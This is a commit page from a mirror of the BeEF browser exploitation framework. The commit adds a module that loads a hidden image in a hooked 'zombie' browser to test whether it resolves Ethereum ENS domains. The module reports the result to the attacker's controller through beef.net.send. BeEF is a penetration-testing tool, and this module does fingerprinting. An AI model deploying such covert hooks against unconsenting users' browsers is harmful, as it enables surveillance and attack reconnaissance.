Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Detect Ethereum ENS (#2342)

Browse Source
This commit is contained in:
bcoles
2022-03-09 16:48:40 +11:00
committed by GitHub
parent 4dbced4f55
commit 52996d4fc5
3 changed files with 81 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

43
modules/network/detect_ethereum_ens/command.js Normal file
View File

@@ -0,0 +1,43 @@
//
// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if (document.getElementById('ethereum_ens_img_<%= @command_id %>')) {
return "Img already created";
}
var img = new Image();
img.setAttribute("style", "visibility:hidden");
img.setAttribute("width", "0");
img.setAttribute("height", "0");
img.src = '<%= @ethereum_ens_resource %>';
img.id = 'ethereum_ens_img_<%= @command_id %>';
img.setAttribute("attr", "start");
img.onerror = function() {
this.setAttribute("attr", "error");
};
img.onload = function() {
this.setAttribute("attr", "load");
};
document.body.appendChild(img);
setTimeout(function() {
var img = document.getElementById('ethereum_ens_img_<%= @command_id %>');
if (img.getAttribute("attr") == "error") {
beef.debug('[Detect Ethereum ENS] Browser is not resolving Ethereum ENS domains.');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not resolving Ethereum ENS domains.');
} else if (img.getAttribute("attr") == "load") {
beef.debug('[Detect Ethereum ENS] Browser is resolving Ethereum ENS domains.');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is resolving Ethereum ENS domains.');
} else if (img.getAttribute("attr") == "start") {
beef.debug('[Detect Ethereum ENS] Timed out. Cannot determine if browser is resolving Ethereum ENS domains.');
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timed out. Cannot determine if browser is resolving Ethereum ENS domains.');
};
document.body.removeChild(img);
}, <%= @timeout %>);
});

15
modules/network/detect_ethereum_ens/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_ethereum_ens:
enable: true
category: "Network"
name: "Detect Ethereum ENS"
description: "This module will detect if the zombie is currently using Ethereum ENS resolvers. Note that the detection may fail when attempting to load a HTTP resource from a hooked HTTPS page."
authors: ["wade", "pdp", "bm", "xntrik", "bcoles"]
target:
working: ["ALL"]

23
modules/network/detect_ethereum_ens/module.rb Normal file
View File

@@ -0,0 +1,23 @@
#
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_ethereum_ens < BeEF::Core::Command
def self.options
[
{ 'name' => 'ethereum_ens_resource', 'ui_label' => 'What Ethereum ENS image resource to request', 'value' => 'http://ens.eth/static/favicon-6305d6ce89910df001b94e8a31eb08f5.ico' },
# Alternatives:
# http://esteroids.eth/favicon.ico
# http://api3.eth/api3-logo-white.svg
# http://api3.eth/favicon.ico
{ 'name' => 'timeout', 'ui_label' => 'Detection timeout', 'value' => '15000' }
]
end
def post_execute
return if @datastore['result'].nil?
save({ 'result' => @datastore['result'] })
end
end